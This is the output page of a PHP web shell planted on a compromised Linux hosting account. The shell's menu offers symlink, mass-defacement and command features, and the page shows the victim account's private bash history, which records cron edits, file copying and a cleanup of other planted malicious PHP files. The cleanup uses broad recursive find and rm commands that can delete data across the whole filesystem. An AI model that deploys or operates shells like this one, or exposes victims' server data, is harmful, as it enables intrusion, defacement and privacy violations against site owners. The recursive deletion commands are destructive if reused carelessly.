Comming ucUs SH3LL V.2

Path : /home/gujo45me/
Disable Functions : exec,passthru,shell_exec,system
System : Linux server-604606.appsiete.com 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
[ Home ][ Zone-h ][ Jumping ][ Symlink ][ Mass Depes ][ Command ]
File Upload :
Current File : /home/gujo45me/.bash_history

#1712238853
crontab -e
#1712239037
export VISUAL=vim
#1712239041
crontab -e
#1712708334
DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html"
#1712708334
ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Http/Controllers/XmlController.php"
#1712708334
SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/)
#1712708334
for SUBDOMINIO in ${SUBDIRECTORIOS}; do          ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Http/Controllers/XmlController.php";       if [ -f "$ARCHIVO_ORIGINAL" ]; then          yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}";         echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}";     else         echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}";     fi; done
#1713404403
crontab -e
#1713404420
vim
#1713404611
sudo export VISUAL=vi; crontab -e
#1713404654
export VISUAL=vim; crontab -e
#1713404743
 crontab -e
#1714612200
export VISUAL=vim; crontab -e
#1715986054
DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html"
#1715986054
ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Http/Controllers/XmlController.php"
#1715986054
SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/)
#1715986054
for SUBDOMINIO in ${SUBDIRECTORIOS}; do          ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Http/Controllers/XmlController.php";       if [ -f "$ARCHIVO_ORIGINAL" ]; then          yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}";         echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}";     else         echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}";     fi; done
#1715986054
echo "Proceso completado"
#1715986676
DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html"
#1715986676
ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Http/Controllers/XmlController.php"
#1715986676
SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/)
#1715986676
for SUBDOMINIO in ${SUBDIRECTORIOS}; do          ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Http/Controllers/XmlController.php";       if [ -f "$ARCHIVO_ORIGINAL" ]; then          yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}";         echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}";     else         echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}";     fi; done
#1715986676
echo "Proceso completado"
#1716253990
export VISUAL=vim; crontab -e
#1717463322
crontab -e
#1717463372
export VISUAL=vim; crontab -e
#1717643858
DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html"
#1717643858
ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Helpers/sunat.php"
#1717643858
SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/)
#1717643858
for SUBDOMINIO in ${SUBDIRECTORIOS}; do          ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Helpers/sunat.php";       if [ -f "$ARCHIVO_ORIGINAL" ]; then          yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}";         echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}";     else         echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}";     fi; done
#1718069835
export VISUAL=vim; crontab -e
#1721669625
DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html"
#1721669625
ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Http/Controllers/XmlController.php"
#1721669625
SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/)
#1721669625
for SUBDOMINIO in ${SUBDIRECTORIOS}; do          ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Http/Controllers/XmlController.php";       if [ -f "$ARCHIVO_ORIGINAL" ]; then          yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}";         echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}";     else         echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}";     fi; done
#1722874332
export VISUAL=vim; crontab -e
#1731956359
uapi SSL | grep remove
#1731956371
uapi SSL | grep exclude
#1731956433
uapi 
#1731956461
uapi SSL get_autossl_excluded_domains
#1731956586
ll
#1731956607
exit
#1748312488
crontab -e
#1748312535
export VISUAL=vim; crontab -e
#1752333766
find /home/gujo45me -type d \( -name "wp-admin" -o -name "wp-content" -o -name "wp-includes" \) -exec rm -rf {} + 2>/dev/null
#1752333862
find /home/gujo45me -type f \( -name "7b3658dfc7.php" -o -name "index.html0" -o -name "item.php" -o -name "rsqorrmf.php" -o -name "search.php" -o -name "server.php" -o -name "uxbzagpc.php" -o -name "wordfence-waf.php" -o -name "wp-call.php" -o -name "wp-log1n.php" \) -exec rm -f {} + 2>/dev/null
#1752334829
chmod -R u+rwX /home/gujo45me
#1752335813
chown -R gujo45me:gujo45me /home/gujo45me
#1752427104
rm -f .env.example .gitignore .htaccess click.php index.php p.php package.json php.ini phpunit.xml readme.md && exit
#1761582794
export VISUAL=vim; crontab -e
#1762303949
for dir in /home/appseven/public_html/*/; do     echo "Revisando: $dir";     rm -f "$dir"l3gi0n.php 2>/dev/null && echo "Eliminado: $dir.doge.php";     rm -f "$dir"Legion 2>/dev/null && echo "Eliminado: $dir.send.php";     rm -f "$dir".term.php 2>/dev/null && echo "Eliminado: $dir.term.php"; done
#1762303963
ls
#1762304040
cd..
#1762304044
ls
#1762304085
cd public_html
#1762304089
for dir in /home/appseven/public_html/*/; do     echo "Revisando: $dir";     rm -f "$dir"l3gi0n.php 2>/dev/null && echo "Eliminado: $dir.doge.php";     rm -f "$dir"Legion 2>/dev/null && echo "Eliminado: $dir.send.php";     rm -f "$dir".term.php 2>/dev/null && echo "Eliminado: $dir.term.php"; done
#1762304249
for dir in /home/appseven/public_html/*/; do     echo "Revisando: $dir";     rm -f "$dir"l3gi0n.php 2>/dev/null && echo "Eliminado: $dirl3gi0n.php";     rm -f "$dir"Legion 2>/dev/null && echo "Eliminado: $dirLegion "; done
#1762304346
for dir in /home/appseven/public_html/*/; do     echo "Revisando: $dir";     rm -f "$dir"l3gi0n.php 2>/dev/null && echo "Eliminado: $dir/l3gi0n.php";     rm -f "$dir"Legion 2>/dev/null && echo "Eliminado: $dir/Legion"; done
#1762304484
find / -name "l3gi0n.php" -type f -delete 2>/dev/null
#1762304489
find / -name "Legion" -type f -delete 2>/dev/null
#1762304645
#!/bin/bash
#1762304645
echo "=== ELIMINANDO ARCHIVOS MALICIOSOS ==="
#1762304645
# Eliminar archivos específicos
#1762304645
find /home /var/www -name "l3gi0n.php" -type f -delete 2>/dev/null
#1762304675
find /home /var/www -name "Bg0in.php" -type f -delete 2>/dev/null
#1762304694
find /home /var/www -name "Legion.php" -type f -delete 2>/dev/null
#1762304717
find /home /var/www -name "Legion" -type f -delete 2>/dev/null
#1762304733
echo "Eliminación completada"
#1762304733
# Verificar que se eliminaron
#1762304733
echo "=== VERIFICANDO QUE SE ELIMINARON ==="
#1762304733
find /home /var/www \( -name "l3gi0n.php" -o -name "Bg0in.php" -o -name "Legion.php" -o -name "Legion" \) -type f 2>/dev/null
#1762304753
if [ $? -eq 0 ]; then     echo "✅ Todos los archivos maliciosos fueron eliminados"; else     echo "❌ Algunos archivos podrían seguir existiendo"; 
#1764905597
export VISUAL=vim; crontab -e

Copyright © 2019 | Powered By MecUs7